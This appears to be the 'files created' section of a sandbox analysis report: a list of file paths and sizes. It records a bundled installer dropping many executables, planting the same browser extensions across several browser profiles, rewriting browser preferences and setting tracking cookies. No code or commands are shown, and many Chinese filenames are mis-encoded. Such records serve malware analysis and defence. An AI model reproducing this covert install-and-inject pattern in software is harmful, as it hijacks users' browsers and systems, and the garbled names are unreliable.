    %Documents and Settings%\%current user%\Start Menu\Programs\绝色唐门\绝色唐门.lnk (599 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
    %Documents and Settings%\All Users\Start Menu\绝色唐门.lnk (587 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\F0916_s_30897.exe (9843602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (93 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Preferences (601 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Preferences (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\绝色唐门.lnk (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\jstm\config.ini (379 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\FindProcDLL.dll (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\v6svc.dll (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\oem.ini (443 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\OfficeAssist.0195.80.1015.exe (37179 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\demo.ppt (1644 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\updateself.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\3.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\104.png (275 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\6.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\1.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_fg.png (256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\setup.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\updateself.exe (2128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\2.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist.dll (7748 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility\uninst.exe (5951 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe (3361 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\文档美化大师.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\setup.cfg (501 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\102.png (233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\100.png (238 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\101.png (951 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\meihua.exe (2268 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\setup.cfg (501 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\feature.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\product.xml (334 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\卸载.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\31.png (875 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\feature.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\103.png (346 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist64.dll (5900 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_bg.png (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\assistupdate.exe (9662 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\demo.ppt (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\meihua.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\25.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\assistupdate.exe (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\5.png (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\11.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\10.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist64.dll (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_polish.png (340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\qqtj2[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\qqtj1[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\qqtj1[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[2].js (3960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\xkna_50091167828[1].exe (627004 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\softcount[1].htm (109 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\setup_2948-140896[1].exe (1118776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\axuls[1].exe (52983 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\pic[1].gif (719 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\popup[1].htm (627 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[2].js (8 bytes)
    %Program Files%\fjwyusp\axult.exe (53796 bytes)
    %Program Files%\fjwyusp\-1303_1_td.exe (30482 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\axult[1].exe (56481 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\core[1].php (752 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\a-zm-157391-v5[1].exe (304039 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Program Files%\fjwyusp\IFoxInstall-y-c203945859-run-s-x.exe (181646 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\IFoxInstall-y-c203945859-run-s-x[1].exe (184025 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\pwc[1].htm (1048 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[1].js (3 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\stat[1].gif (43 bytes)
    %Program Files%\fjwyusp\xkcc_50091167828.exe (561484 bytes)
    %Program Files%\fjwyusp\axuls.exe (51909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[1].js (3380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\-1303_1_td[1].exe (33209 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_ (319 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\stat[1].php (5114 bytes)
    %Program Files%\fjwyusp\setup_2948-140896.exe (1064854 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (251 bytes)
    %Program Files%\fjwyusp\pwc.dll (1 bytes)
    %Program Files%\fjwyusp\a-zm-157391-v5.exe (289171 bytes)
    %Program Files%\fjwyusp\hzsoft\htop_x.exe (293112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\htop_x[1].exe (317913 bytes)
    %Program Files%\fjwyusp\hzsoft\sjss_jing_zhimeng_217.exe (151302 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\apples_5_1008[1].exe (342852 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\sjss_jing_zhimeng_217[1].exe (155529 bytes)
    %Program Files%\fjwyusp\hzsoft\tqrl_89_177560.exe (793877 bytes)
    %Program Files%\fjwyusp\hzsoft\apples_5_1008.exe (319897 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\tqrl_89_177560[1].exe (838270 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-G9VJJ.tmp\Application Dataypfbyfgmr.tmp (6356 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Skin\AppleDesktopSkin.skn (8184 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\uninst.exe (1299 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\mini.exe (13368 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleDCR.xml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Skin\AppleDefaultSkin.skn (22 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\AppleDTShellExt64.dll (11048 bytes)
    %Documents and Settings%\%current user%\Desktop\Æ»¹û×ÀÃæ.lnk (976 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\AppleHelper.exe (21216 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleROCfg.ini (23 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Æ»¹û×ÀÃæ\Æ»¹û×ÀÃæ.lnk (992 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\AppleDTShellExt.dll (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\focuslogo.png (5 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDesktop.exe (59286 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleROData.dat (6 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\bg_header1.png (784 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Æ»¹û×ÀÃæ\жÔØ Æ»¹û×ÀÃæ.lnk (785 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_min_2.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_min_1.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\dshow.exe (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDTAssistant.exe (16288 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_1.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_2.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_3.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe (8184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw2.tmp (106535 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleSC.json (8 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÐÇï½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÐÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\tjapis[1].htm (91 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùͯ½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-СÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (138023 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÆßϦ½Ú.png (930 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÔÆ.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-СѩתÖÐÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Base64.dll (4 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ïû·ÑÕß.png (706 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÀͶ¯½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýϦ.png (1 bytes)
    %Documents and Settings%\%current user%\Templates\1820149\YYM_955WD30.gif (930 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÐÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÐÂ.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-Сѩ.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÍÄî.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÐÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Math.dll (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÐÓêת´óÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
